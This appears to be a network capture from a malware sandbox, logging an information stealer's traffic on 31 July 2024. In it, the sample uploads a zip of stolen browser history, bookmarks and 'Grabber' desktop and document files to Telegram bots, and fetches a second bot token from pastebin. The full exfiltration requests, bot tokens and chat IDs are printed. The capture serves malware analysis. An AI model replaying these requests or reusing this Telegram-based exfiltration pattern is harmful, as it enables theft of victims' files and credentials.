2024-07-31 05:07:14 UTC	1880	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 30 39 37 39 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 32 33 38 31 35 30 32 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 44 69 61 6d 6f 74 72 69 78 42 6f 74 73 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 44 69 61 6d 6f 74 72 69 78 42 6f 74 73 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 35 37 39 35 34 38 30 34 36 39 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 44 69 61 6d 6f 74 72 69 78 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 44 69 61 6d 6f 74 72 69 78 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 32 34 30 32 34 33 34 2c 22 74 65 78 74 Data Ascii: {"ok":true,"result":{"message_id":109795,"from":{"id":6082381502,"is_bot":true,"first_name":"DiamotrixBotss","username":"DiamotrixBotss_bot"},"chat":{"id":5795480469,"first_name":"Diamotrix","username":"Diamotrix","type":"private"},"date":1722402434,"text

Timestamp	Bytes transferred	Direction	Data
2024-07-31 05:07:15 UTC	171	OUT	GET /bot6082381502:AAFgFkge53k6kBZcTN8CBICiZV-VphQ1WgA/sendMessage?chat_id=5795480469&text=%F0%9F%93%81%20Uploading%20Log%20Folders... HTTP/1.1 Host: api.telegram.org
2024-07-31 05:07:15 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 31 Jul 2024 05:07:15 GMT Content-Type: application/json Content-Length: 298 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-07-31 05:07:15 UTC	298	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 30 39 37 39 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 32 33 38 31 35 30 32 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 44 69 61 6d 6f 74 72 69 78 42 6f 74 73 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 44 69 61 6d 6f 74 72 69 78 42 6f 74 73 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 35 37 39 35 34 38 30 34 36 39 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 44 69 61 6d 6f 74 72 69 78 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 44 69 61 6d 6f 74 72 69 78 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 32 34 30 32 34 33 35 2c 22 74 65 78 74 Data Ascii: {"ok":true,"result":{"message_id":109796,"from":{"id":6082381502,"is_bot":true,"first_name":"DiamotrixBotss","username":"DiamotrixBotss_bot"},"chat":{"id":5795480469,"first_name":"Diamotrix","username":"Diamotrix","type":"private"},"date":1722402435,"text

Timestamp	Bytes transferred	Direction	Data
2024-07-31 05:07:16 UTC	254	OUT	POST /bot6082381502:AAFgFkge53k6kBZcTN8CBICiZV-VphQ1WgA/sendDocument?chat_id=5795480469 HTTP/1.1 Content-Type: multipart/form-data; boundary="18567fe5-3a12-4dc9-8dbd-9e3337ea578c" Host: api.telegram.org Content-Length: 154180 Expect: 100-continue
2024-07-31 05:07:16 UTC	25	IN	HTTP/1.1 100 Continue
2024-07-31 05:07:16 UTC	40	OUT	Data Raw: 2d 2d 31 38 35 36 37 66 65 35 2d 33 61 31 32 2d 34 64 63 39 2d 38 64 62 64 2d 39 65 33 33 33 37 65 61 35 37 38 63 0d 0a Data Ascii: --18567fe5-3a12-4dc9-8dbd-9e3337ea578c
2024-07-31 05:07:16 UTC	265	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 6a 6f 6e 65 73 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 61 65 34 30 35 34 34 64 37 38 37 34 64 61 30 62 36 64 34 38 33 65 63 38 31 65 63 32 64 36 33 31 5c 6a 6f 6e 65 73 40 38 39 39 35 35 32 5f 65 6e 2d 43 48 2e 7a 69 70 22 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 43 25 33 41 25 35 43 55 73 65 72 73 25 35 43 6a 6f 6e 65 73 25 35 43 41 70 70 44 61 74 61 25 35 43 4c 6f 63 61 6c 25 35 43 61 65 34 30 35 34 34 64 37 38 37 34 64 61 30 62 36 64 34 38 33 65 63 38 31 65 63 32 64 36 33 31 25 35 43 6a 6f 6e 65 73 25 34 30 38 39 39 35 35 32 5f 65 6e 2d Data Ascii: Content-Disposition: form-data; name=document; filename="C:\Users\user\AppData\Local\ae40544d7874da0b6d483ec81ec2d631\user@899552_en-CH.zip"; filename*=utf-8''C%3A%5CUsers%5Cuser%5CAppData%5CLocal%5Cae40544d7874da0b6d483ec81ec2d631%5Cuser%40899552_en-
2024-07-31 05:07:16 UTC	16355	OUT	Data Raw: 50 4b 03 04 14 00 00 00 00 00 90 2c ff 58 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 00 00 42 72 6f 77 73 65 72 73 5c 45 64 67 65 5c 50 4b 03 04 14 00 00 00 08 00 e2 08 ff 58 51 33 92 06 4a 00 00 00 69 00 00 00 1e 00 00 00 42 72 6f 77 73 65 72 73 5c 46 69 72 65 66 6f 78 5c 42 6f 6f 6b 6d 61 72 6b 73 2e 74 78 74 53 56 56 56 70 4f 2d 51 f0 48 cd 29 50 50 56 56 e6 02 62 05 e7 d2 e2 92 fc dc cc aa 54 05 b7 cc a2 d4 b4 fc 0a b8 0c 48 a9 67 5e 59 7e 4e 59 6a 0a 5c d0 31 29 bf b4 44 21 b4 18 59 55 49 66 5e ba 42 70 49 62 51 09 54 21 00 50 4b 03 04 14 00 00 00 08 00 e2 08 ff 58 63 c2 65 e7 53 00 00 00 5e 00 00 00 1c 00 00 00 42 72 6f 77 73 65 72 73 5c 46 69 72 65 66 6f 78 5c 48 69 73 74 6f 72 79 2e 74 78 74 53 56 56 56 70 cb 2c 4a 4d cb af 50 08 28 ca 2c 4b 4c ae Data Ascii: PK,XBrowsers\Edge\PKXQ3JiBrowsers\Firefox\Bookmarks.txtSVVVpO-QH)PPVVbTHg^Y~NYj\1)D!YUIf^BpIbQT!PKXceS^Browsers\Firefox\History.txtSVVVp,JMP(,KL
2024-07-31 05:07:16 UTC	16355	OUT	Data Raw: 98 ba 4a cb df da 4a 7b e1 ea 07 5f 3b ad fa fd fd 03 50 4b 03 04 14 00 00 00 08 00 51 40 44 57 64 2f 29 68 83 02 00 00 02 04 00 00 3e 00 00 00 47 72 61 62 62 65 72 5c 44 52 49 56 45 2d 43 5c 55 73 65 72 73 5c 6a 6f 6e 65 73 5c 44 65 73 6b 74 6f 70 5c 4f 4e 42 51 43 4c 59 53 50 55 5c 4f 4e 42 51 43 4c 59 53 50 55 2e 64 6f 63 78 15 53 49 6e 00 31 08 bb 57 ea a3 12 b2 07 b2 6f f0 ff 87 74 7a 43 08 19 db 98 5a 74 07 e4 d9 b6 36 aa 43 f4 5c ee 0b cd 96 5e 30 89 7f 10 de 2c 4f 0a 88 de 81 cd 6b 96 20 35 75 b9 cf 13 c8 e7 90 b6 73 8e 8d 7a 46 85 8a 55 89 6d eb ca ba c6 37 87 8f 08 1e 42 8c a9 3e 3a a3 d0 a6 15 e1 84 3e 6f 51 3e 32 74 5d 45 42 2d f7 ea 97 cd 4e ac 47 9b 58 9c 5f 3b ba 55 7c b2 6a d5 97 83 75 64 87 ea 72 34 75 9f 65 e7 67 34 f9 91 4c ad 5e 2d 91 Data Ascii: JJ{_;PKQ@DWd/)h>Grabber\DRIVE-C\Users\user\Desktop\ONBQCLYSPU\ONBQCLYSPU.docxSIn1WotzCZt6C\^0,Ok 5uszFUm7B>:>oQ>2t]EB-NGX_;U\|judr4ueg4L^-
2024-07-31 05:07:16 UTC	16355	OUT	Data Raw: 51 40 44 57 59 f1 45 0f 84 02 00 00 02 04 00 00 34 00 00 00 47 72 61 62 62 65 72 5c 44 52 49 56 45 2d 43 5c 55 73 65 72 73 5c 6a 6f 6e 65 73 5c 44 6f 63 75 6d 65 6e 74 73 5c 55 4d 4d 42 44 4e 45 51 42 4e 2e 6a 70 67 0d 93 49 92 45 21 08 04 f7 1d f1 0f e5 c8 73 42 45 05 f5 fe 07 69 83 15 6c aa a0 92 55 8a b6 e8 ba 46 0e 45 23 7c e7 1a 9d b6 94 1e d3 09 63 2a 1c 84 7e 6f 9d 54 0e c1 15 27 ca 77 d7 a6 2b d7 84 bd b1 74 0d 75 cb b0 67 28 49 e1 b4 18 26 92 2b 4c bb b5 78 fd 9a 05 88 08 a6 f9 38 3b e1 15 e1 ba d5 b9 62 67 65 9c 97 bb 4c 50 7e 37 0f 3b ac 5a f5 75 ae 40 91 d8 83 4b 29 98 13 e3 53 5c e9 5c 15 1d ac 9e c0 36 6a db 54 09 4d d3 82 4f ac bf 19 46 ba fc 14 b8 41 76 1e 21 70 d6 8c aa f2 56 0d d4 54 36 ea d0 a7 c6 08 b2 69 b8 93 cc e0 5b c7 34 fa 3b fe Data Ascii: Q@DWYE4Grabber\DRIVE-C\Users\user\Documents\UMMBDNEQBN.jpgIE!sBEilUFE#\|c*~oT'w+tug(I&+Lx8;bgeLP~7;Zu@K)S\\6jTMOFAv!pVT6i[4;
2024-07-31 05:07:16 UTC	16355	OUT	Data Raw: 2e d7 8d f6 b9 50 98 3a 0c 15 7b b3 a6 36 2a 69 5b c8 f6 54 d5 f5 0e e9 ac 0e fc 15 1e 8f 8b 6c ae 33 bc 60 f2 0c c6 d8 7c 43 9e d1 3a 00 4d fa 95 f9 a9 6c a0 30 9c cb 31 16 af ce bb 6e ef d5 b2 b9 b8 f7 09 17 e3 fd dc 70 d4 77 df 13 93 3e 15 f4 44 f6 6b 36 6d 9a 73 bd 56 4f b6 58 10 19 a1 ee 9c bb 2b 75 d2 66 0e 68 23 81 c2 46 39 05 59 ef 7a 4f b4 da bb 79 d5 58 0a db fc 3e 10 83 f1 32 94 8e f8 b6 29 06 4f 01 bb 03 bb cb 18 bc 5a ed 23 43 82 45 1f c7 77 fd d7 4b 92 d6 02 40 dc 5d c7 51 cb 68 a8 77 9d 1a e9 5a fb 32 7f df be 25 76 4c d9 88 6d b8 61 fb ba a3 b6 ae 7c d4 0d c5 06 3c 0f e1 33 1d e9 3d 3e 17 18 89 7b f4 6c c1 8b b6 74 52 1c 56 63 8f 0a b5 51 16 55 18 e5 7c d9 5f 5f 38 4a 90 42 7e a5 f9 dc 99 b0 62 aa 10 db 85 58 ff f1 78 45 f9 61 ab d2 70 b7 Data Ascii: .P:{6*i[Tl3`\|C:Ml01npw>Dk6msVOX+ufh#F9YzOyX>2)OZ#CEwK@]QhwZ2%vLma\|<3=>{ltRVcQU\|__8JB~bXxEap
2024-07-31 05:07:16 UTC	16355	OUT	Data Raw: ac 60 21 8d 66 2f 52 c7 50 17 2a ac cd 09 a7 f6 55 ce 60 9f d4 87 a0 e3 86 27 37 04 80 0d ab f5 a9 b4 9e b7 46 de 92 c0 74 e2 19 23 90 ae bc e3 a8 a1 64 1c 5a d5 8c d6 19 57 e5 bb 8a a0 3b 11 d7 96 b6 85 e7 5b 46 44 49 1a 91 5c 28 c0 57 c3 55 ed 43 18 90 d3 13 31 11 d3 8f 65 94 40 2b 64 78 1e 62 f8 91 b7 44 84 23 25 37 88 64 1f 6f 70 30 f3 b8 2d 8e e7 f8 52 3a ce 4d ac 2a 6a 02 0b 98 44 e1 28 c0 50 dc a2 76 2e 5d 2d 84 5b cf 5a d5 21 2c 5a cf 73 22 d9 73 97 24 bc 99 71 4b b0 9b 09 b7 30 8a bd 54 05 64 19 8b 43 f9 da 89 8c a1 9c cb fa 01 44 c2 f2 8a 56 0b d9 d2 3c 5b ad 3f 4c ab 29 09 5e 77 e8 da 3e a3 c5 92 ed ba b2 98 a1 d0 0a 01 f8 b5 3c 27 52 71 39 48 46 09 57 bc 30 b9 1e 4a 23 87 80 32 c6 fb e6 d2 e5 b6 0a e7 bb 76 d3 9b f3 8d f7 23 20 71 e9 aa 14 80 Data Ascii: `!f/RPU`'7Ft#dZW;[FDI\(WUC1e@+dxbD#%7dop0-R:MjD(Pv.]-[Z!,Zs"s$qK0TdCDV<[?L)^w><'Rq9HFW0J#2v# q
2024-07-31 05:07:16 UTC	16355	OUT	Data Raw: 59 eb 3e c3 8e 16 7f b6 de da 55 6f d3 db 1f 68 e3 7c 9e 50 8e 16 31 f5 15 11 f8 d6 ef ab e2 03 aa 30 d6 6b fd 97 7f e6 13 08 d5 53 21 7e 24 d8 93 cf 08 73 d2 fe 4f 16 83 89 9f 74 40 9c 18 52 9c fc d2 47 9c c7 d8 1c 92 08 eb a4 7d 22 97 02 ca 9a 83 02 6e 42 a5 65 4e bd 51 11 08 9d ae ac 25 de 59 10 81 c3 e2 98 62 3e f0 6c d8 0b 5b cf 51 45 98 83 a0 6e b3 1f 76 32 b3 8e 22 fb eb a7 ab d9 79 82 cf 07 11 b9 17 07 d5 c4 8b 6e db b2 0b b4 98 f8 80 46 ee 92 06 3b d1 b9 91 92 e3 fc d3 e4 13 9c a4 bf 51 60 0a 92 c8 a4 95 2c 2c 80 08 40 b4 73 40 c0 08 44 03 a5 0d 66 65 52 83 0a 53 e9 ca 45 b5 f0 09 0c 24 d2 bb 81 49 cb 30 f0 54 5f 2d 0f c7 a4 d4 4a 00 32 2a bc 89 c3 b0 ab 82 12 17 69 b3 ec 20 ea 28 5f 01 88 52 73 ab 16 bf b3 1f 8c 78 83 f2 0a 60 b2 6c af a4 62 56 Data Ascii: Y>Uoh\|P10kS!~$sOt@RG}"nBeNQ%Yb>l[QEnv2"ynF;Q`,,@s@DfeRSE$I0T_-J2*i (_Rsx`lbV
2024-07-31 05:07:16 UTC	16355	OUT	Data Raw: 49 48 b7 84 11 67 9e 6f dc 09 bc 16 6b b4 07 73 5c 2f 14 de 69 b4 24 0f 35 9c 5d 1b 0b a4 a2 fb 60 6d f5 49 43 a2 83 ff 9a fc 2f 20 e8 01 20 bd bb 5d a4 48 e3 22 ab 12 26 3c 51 10 78 c5 f2 8e f4 f7 9f 77 2e 0a 55 c7 d4 e9 b8 eb f4 8c e4 0e 3c 36 b4 9b 12 a5 3e 6b 69 6b aa f8 b1 d8 de b1 2a d3 e1 1e 4a 1b 96 30 da bf 76 65 7b 5d 7d 3e 38 58 46 f5 c7 46 d5 aa 8b bb f6 e4 ad 57 71 ad fa d7 19 df 34 f6 0e 8d 27 ae 9f bd 47 6d c0 89 7c 11 38 2c e5 f1 f3 0c 7e 77 4b c2 79 f2 f8 0e 5e b1 3b ef ed 37 59 c4 97 5b 6f 37 7f 13 80 8c 32 02 30 79 a7 c8 4c 2d 7a b9 6c f0 bd cc 97 2e 6f 9f e2 b7 c7 fb 0d e1 07 c3 39 49 8a 3b ed 8f 09 00 9f 87 ed 6f e7 9b 0e 5d c4 7b c2 c1 9f 34 43 69 ca 12 4c b5 91 38 d2 06 c1 04 40 b6 9f af dc 82 00 60 be e1 f7 f1 3e 7b 83 8e 6f 0f e5 Data Ascii: IHgoks\/i$5]`mIC/ ]H"&<Qxw.U<6>kik*J0ve{]}>8XFFWq4'Gm\|8,~wKy^;7Y[o720yL-zl.o9I;o]{4CiL8@`>{o
2024-07-31 05:07:16 UTC	16355	OUT	Data Raw: b1 e9 64 25 95 6d eb 95 4d bf 10 68 6a b3 09 ab a5 f2 bc 3b ed 93 25 99 2c 32 77 27 b6 7a aa 43 c1 9b ba 31 8c 2b c0 24 89 4b 60 f6 19 ec 75 41 90 01 7e 13 1e 93 7b fa 8f be b1 fb 3e 76 c6 ae d6 01 76 eb ca ec 30 01 f8 ae 13 a0 aa 51 12 b5 73 4f 6d 9f 45 48 ac 9a ea 90 06 b9 a3 be 51 f0 c1 97 58 94 8c af 72 9a e6 28 d7 dd e4 f8 59 80 18 0b b4 de 41 16 4b 2f e9 1b 1e f2 41 9e 62 d7 34 2a 21 c4 3a 91 9b 8e 18 62 f2 6c bc 11 d0 cc de 0b 4e 55 b3 24 cf 1b 92 1e 8a 5a e7 0f a7 74 57 73 cc 7c 15 f6 b0 d0 ef e1 e1 66 5a 37 7c bd 20 c1 4d 9f 00 58 f2 1d ba 23 67 8c 40 d0 bd b5 ab c7 86 5f cb 39 14 d3 22 00 8f 26 93 9d 0b df 0e b1 05 95 12 00 0b b4 aa 74 0f 83 56 ec 53 bc 5a 34 1e 56 cf 2f db ed f1 82 bb 2b 20 e2 a4 7d 6c 1c 93 6d f4 86 f6 d8 18 78 95 98 52 a5 31 Data Ascii: d%mMhj;%,2w'zC1+$K`uA~{>vv0QsOmEHQXr(YAK/Ab4*!:blNU$ZtWs\|fZ7\| MX#g@_9"&tVSZ4V/+ }lmxR1
2024-07-31 05:07:17 UTC	904	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 31 Jul 2024 05:07:17 GMT Content-Type: application/json Content-Length: 516 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":109797,"from":{"id":6082381502,"is_bot":true,"first_name":"DiamotrixBotss","username":"DiamotrixBotss_bot"},"chat":{"id":5795480469,"first_name":"Diamotrix","username":"Diamotrix","type":"private"},"date":1722402437,"document":{"file_name":"C_UsersuserAppDataLocalae40544d7874da0b6d483ec81ec2d631user@89.zip","mime_type":"application/zip","file_id":"BQACAgQAAxkDAAEBrOVmqcaF2pac2k9ymOg-5u7zfAnlpgACbBYAAlPRUVEd0IGxF7EHoTUE","file_unique_id":"AgADbBYAAlPRUVE","file_size":153831}}}

Timestamp	Bytes transferred	Direction	Data
2024-07-31 05:07:17 UTC	74	OUT	GET /raw/7B75u64B HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
2024-07-31 05:07:18 UTC	391	IN	HTTP/1.1 200 OK Date: Wed, 31 Jul 2024 05:07:18 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: EXPIRED Last-Modified: Wed, 31 Jul 2024 05:07:18 GMT Server: cloudflare CF-RAY: 8abb1065db4142a7-EWR
2024-07-31 05:07:18 UTC	52	IN	Data Raw: 32 65 0d 0a 35 33 39 30 37 35 37 37 38 38 3a 41 41 46 56 36 35 59 64 75 6e 39 4f 50 34 30 67 37 38 58 78 49 35 65 44 62 56 34 32 4b 71 48 59 35 6d 55 0d 0a Data Ascii: 2e5390757788:AAFV65Ydun9OP40g78XxI5eDbV42KqHY5mU
2024-07-31 05:07:18 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-07-31 05:07:19 UTC	254	OUT	POST /bot5390757788:AAFV65Ydun9OP40g78XxI5eDbV42KqHY5mU/sendDocument?chat_id=5283662956 HTTP/1.1 Content-Type: multipart/form-data; boundary="461e744f-41a2-4c05-9fb8-af447dc13f3c" Host: api.telegram.org Content-Length: 154180 Expect: 100-continue
2024-07-31 05:07:19 UTC	25	IN	HTTP/1.1 100 Continue
2024-07-31 05:07:19 UTC	40	OUT	Data Raw: 2d 2d 34 36 31 65 37 34 34 66 2d 34 31 61 32 2d 34 63 30 35 2d 39 66 62 38 2d 61 66 34 34 37 64 63 31 33 66 33 63 0d 0a Data Ascii: --461e744f-41a2-4c05-9fb8-af447dc13f3c
2024-07-31 05:07:19 UTC	265	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 6a 6f 6e 65 73 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 61 65 34 30 35 34 34 64 37 38 37 34 64 61 30 62 36 64 34 38 33 65 63 38 31 65 63 32 64 36 33 31 5c 6a 6f 6e 65 73 40 38 39 39 35 35 32 5f 65 6e 2d 43 48 2e 7a 69 70 22 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 43 25 33 41 25 35 43 55 73 65 72 73 25 35 43 6a 6f 6e 65 73 25 35 43 41 70 70 44 61 74 61 25 35 43 4c 6f 63 61 6c 25 35 43 61 65 34 30 35 34 34 64 37 38 37 34 64 61 30 62 36 64 34 38 33 65 63 38 31 65 63 32 64 36 33 31 25 35 43 6a 6f 6e 65 73 25 34 30 38 39 39 35 35 32 5f 65 6e 2d Data Ascii: Content-Disposition: form-data; name=document; filename="C:\Users\user\AppData\Local\ae40544d7874da0b6d483ec81ec2d631\user@899552_en-CH.zip"; filename*=utf-8''C%3A%5CUsers%5Cuser%5CAppData%5CLocal%5Cae40544d7874da0b6d483ec81ec2d631%5Cuser%40899552_en-
2024-07-31 05:07:19 UTC	16355	OUT	Data Raw: 50 4b 03 04 14 00 00 00 00 00 90 2c ff 58 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 00 00 42 72 6f 77 73 65 72 73 5c 45 64 67 65 5c 50 4b 03 04 14 00 00 00 08 00 e2 08 ff 58 51 33 92 06 4a 00 00 00 69 00 00 00 1e 00 00 00 42 72 6f 77 73 65 72 73 5c 46 69 72 65 66 6f 78 5c 42 6f 6f 6b 6d 61 72 6b 73 2e 74 78 74 53 56 56 56 70 4f 2d 51 f0 48 cd 29 50 50 56 56 e6 02 62 05 e7 d2 e2 92 fc dc cc aa 54 05 b7 cc a2 d4 b4 fc 0a b8 0c 48 a9 67 5e 59 7e 4e 59 6a 0a 5c d0 31 29 bf b4 44 21 b4 18 59 55 49 66 5e ba 42 70 49 62 51 09 54 21 00 50 4b 03 04 14 00 00 00 08 00 e2 08 ff 58 63 c2 65 e7 53 00 00 00 5e 00 00 00 1c 00 00 00 42 72 6f 77 73 65 72 73 5c 46 69 72 65 66 6f 78 5c 48 69 73 74 6f 72 79 2e 74 78 74 53 56 56 56 70 cb 2c 4a 4d cb af 50 08 28 ca 2c 4b 4c ae Data Ascii: PK,XBrowsers\Edge\PKXQ3JiBrowsers\Firefox\Bookmarks.txtSVVVpO-QH)PPVVbTHg^Y~NYj\1)D!YUIf^BpIbQT!PKXceS^Browsers\Firefox\History.txtSVVVp,JMP(,KL
2024-07-31 05:07:19 UTC	16355	OUT	Data Raw: 98 ba 4a cb df da 4a 7b e1 ea 07 5f 3b ad fa fd fd 03 50 4b 03 04 14 00 00 00 08 00 51 40 44 57 64 2f 29 68 83 02 00 00 02 04 00 00 3e 00 00 00 47 72 61 62 62 65 72 5c 44 52 49 56 45 2d 43 5c 55 73 65 72 73 5c 6a 6f 6e 65 73 5c 44 65 73 6b 74 6f 70 5c 4f 4e 42 51 43 4c 59 53 50 55 5c 4f 4e 42 51 43 4c 59 53 50 55 2e 64 6f 63 78 15 53 49 6e 00 31 08 bb 57 ea a3 12 b2 07 b2 6f f0 ff 87 74 7a 43 08 19 db 98 5a 74 07 e4 d9 b6 36 aa 43 f4 5c ee 0b cd 96 5e 30 89 7f 10 de 2c 4f 0a 88 de 81 cd 6b 96 20 35 75 b9 cf 13 c8 e7 90 b6 73 8e 8d 7a 46 85 8a 55 89 6d eb ca ba c6 37 87 8f 08 1e 42 8c a9 3e 3a a3 d0 a6 15 e1 84 3e 6f 51 3e 32 74 5d 45 42 2d f7 ea 97 cd 4e ac 47 9b 58 9c 5f 3b ba 55 7c b2 6a d5 97 83 75 64 87 ea 72 34 75 9f 65 e7 67 34 f9 91 4c ad 5e 2d 91 Data Ascii: JJ{_;PKQ@DWd/)h>Grabber\DRIVE-C\Users\user\Desktop\ONBQCLYSPU\ONBQCLYSPU.docxSIn1WotzCZt6C\^0,Ok 5uszFUm7B>:>oQ>2t]EB-NGX_;U\|judr4ueg4L^-
2024-07-31 05:07:19 UTC	16355	OUT	Data Raw: 51 40 44 57 59 f1 45 0f 84 02 00 00 02 04 00 00 34 00 00 00 47 72 61 62 62 65 72 5c 44 52 49 56 45 2d 43 5c 55 73 65 72 73 5c 6a 6f 6e 65 73 5c 44 6f 63 75 6d 65 6e 74 73 5c 55 4d 4d 42 44 4e 45 51 42 4e 2e 6a 70 67 0d 93 49 92 45 21 08 04 f7 1d f1 0f e5 c8 73 42 45 05 f5 fe 07 69 83 15 6c aa a0 92 55 8a b6 e8 ba 46 0e 45 23 7c e7 1a 9d b6 94 1e d3 09 63 2a 1c 84 7e 6f 9d 54 0e c1 15 27 ca 77 d7 a6 2b d7 84 bd b1 74 0d 75 cb b0 67 28 49 e1 b4 18 26 92 2b 4c bb b5 78 fd 9a 05 88 08 a6 f9 38 3b e1 15 e1 ba d5 b9 62 67 65 9c 97 bb 4c 50 7e 37 0f 3b ac 5a f5 75 ae 40 91 d8 83 4b 29 98 13 e3 53 5c e9 5c 15 1d ac 9e c0 36 6a db 54 09 4d d3 82 4f ac bf 19 46 ba fc 14 b8 41 76 1e 21 70 d6 8c aa f2 56 0d d4 54 36 ea d0 a7 c6 08 b2 69 b8 93 cc e0 5b c7 34 fa 3b fe Data Ascii: Q@DWYE4Grabber\DRIVE-C\Users\user\Documents\UMMBDNEQBN.jpgIE!sBEilUFE#\|c*~oT'w+tug(I&+Lx8;bgeLP~7;Zu@K)S\\6jTMOFAv!pVT6i[4;
2024-07-31 05:07:19 UTC	16355	OUT	Data Raw: 2e d7 8d f6 b9 50 98 3a 0c 15 7b b3 a6 36 2a 69 5b c8 f6 54 d5 f5 0e e9 ac 0e fc 15 1e 8f 8b 6c ae 33 bc 60 f2 0c c6 d8 7c 43 9e d1 3a 00 4d fa 95 f9 a9 6c a0 30 9c cb 31 16 af ce bb 6e ef d5 b2 b9 b8 f7 09 17 e3 fd dc 70 d4 77 df 13 93 3e 15 f4 44 f6 6b 36 6d 9a 73 bd 56 4f b6 58 10 19 a1 ee 9c bb 2b 75 d2 66 0e 68 23 81 c2 46 39 05 59 ef 7a 4f b4 da bb 79 d5 58 0a db fc 3e 10 83 f1 32 94 8e f8 b6 29 06 4f 01 bb 03 bb cb 18 bc 5a ed 23 43 82 45 1f c7 77 fd d7 4b 92 d6 02 40 dc 5d c7 51 cb 68 a8 77 9d 1a e9 5a fb 32 7f df be 25 76 4c d9 88 6d b8 61 fb ba a3 b6 ae 7c d4 0d c5 06 3c 0f e1 33 1d e9 3d 3e 17 18 89 7b f4 6c c1 8b b6 74 52 1c 56 63 8f 0a b5 51 16 55 18 e5 7c d9 5f 5f 38 4a 90 42 7e a5 f9 dc 99 b0 62 aa 10 db 85 58 ff f1 78 45 f9 61 ab d2 70 b7 Data Ascii: .P:{6*i[Tl3`\|C:Ml01npw>Dk6msVOX+ufh#F9YzOyX>2)OZ#CEwK@]QhwZ2%vLma\|<3=>{ltRVcQU\|__8JB~bXxEap
2024-07-31 05:07:19 UTC	16355	OUT	Data Raw: ac 60 21 8d 66 2f 52 c7 50 17 2a ac cd 09 a7 f6 55 ce 60 9f d4 87 a0 e3 86 27 37 04 80 0d ab f5 a9 b4 9e b7 46 de 92 c0 74 e2 19 23 90 ae bc e3 a8 a1 64 1c 5a d5 8c d6 19 57 e5 bb 8a a0 3b 11 d7 96 b6 85 e7 5b 46 44 49 1a 91 5c 28 c0 57 c3 55 ed 43 18 90 d3 13 31 11 d3 8f 65 94 40 2b 64 78 1e 62 f8 91 b7 44 84 23 25 37 88 64 1f 6f 70 30 f3 b8 2d 8e e7 f8 52 3a ce 4d ac 2a 6a 02 0b 98 44 e1 28 c0 50 dc a2 76 2e 5d 2d 84 5b cf 5a d5 21 2c 5a cf 73 22 d9 73 97 24 bc 99 71 4b b0 9b 09 b7 30 8a bd 54 05 64 19 8b 43 f9 da 89 8c a1 9c cb fa 01 44 c2 f2 8a 56 0b d9 d2 3c 5b ad 3f 4c ab 29 09 5e 77 e8 da 3e a3 c5 92 ed ba b2 98 a1 d0 0a 01 f8 b5 3c 27 52 71 39 48 46 09 57 bc 30 b9 1e 4a 23 87 80 32 c6 fb e6 d2 e5 b6 0a e7 bb 76 d3 9b f3 8d f7 23 20 71 e9 aa 14 80 Data Ascii: `!f/RPU`'7Ft#dZW;[FDI\(WUC1e@+dxbD#%7dop0-R:MjD(Pv.]-[Z!,Zs"s$qK0TdCDV<[?L)^w><'Rq9HFW0J#2v# q
